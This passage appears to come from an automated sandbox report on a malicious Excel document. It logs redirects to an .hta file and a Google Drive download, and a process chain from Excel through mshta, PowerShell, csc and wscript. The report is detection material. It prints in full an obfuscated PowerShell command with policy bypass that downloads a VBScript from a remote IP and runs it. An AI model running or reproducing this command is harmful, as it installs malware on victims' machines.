                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: mpa.li
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:45 UTC460INHTTP/1.1 302 Found
                                                                                    Server: nginx
                                                                                    Date: Thu, 24 Oct 2024 06:45:45 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 98
                                                                                    Connection: close
                                                                                    X-DNS-Prefetch-Control: off
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                    X-Download-Options: noopen
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Location: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
                                                                                    Vary: Accept
                                                                                    2024-10-24 06:45:45 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 36 2f 62 76 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 6f 6f 64 77 69 74 68 68 69 73 6c 69 66 65 62 65 73 74 74 68 69 67 6e 73 2e 68 74 61
                                                                                    Data Ascii: Found. Redirecting to http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.2249175142.250.186.1424433560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:46:00 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                    Host: drive.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:46:01 UTC1319INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Thu, 24 Oct 2024 06:46:01 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-r7sFEmbeqGe5CN0D0J7edA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.2249176142.250.186.974433560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:46:02 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:46:04 UTC4906INHTTP/1.1 200 OK
                                                                                    Content-Type: image/jpeg
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 2239109
                                                                                    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                    X-GUploader-UploadID: AHmUCY3RSSw8Do4pInIbdPsiT-s6zDuZp9mmoj_FH8uFjBMFv1ivdyRWA88SJLSo0wZ7j3xkR08sF-2UKw
                                                                                    Date: Thu, 24 Oct 2024 06:46:04 GMT
                                                                                    Expires: Thu, 24 Oct 2024 06:46:04 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=WqxmdA==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
                                                                                    2024-10-24 06:46:04 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                    2024-10-24 06:46:04 UTC4884INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                    Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                    2024-10-24 06:46:04 UTC1325INData Raw: f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68
                                                                                    Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(h
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                    Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                    Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                    Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                    Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                    Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                    Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                    2024-10-24 06:46:04 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                    Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:02:44:58
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                    Imagebase:0x13f9c0000
                                                                                    File size:28'253'536 bytes
                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:02:45:23
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                    Imagebase:0x13f4d0000
                                                                                    File size:13'824 bytes
                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:02:45:26
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:02:45:29
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:02:45:31
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"
                                                                                    Imagebase:0x13f670000
                                                                                    File size:2'758'280 bytes
                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:02:45:32
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp" "c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP"
                                                                                    Imagebase:0x13fc80000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:02:45:36
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
                                                                                    Imagebase:0xff070000
                                                                                    File size:168'960 bytes
                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:02:45:37
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
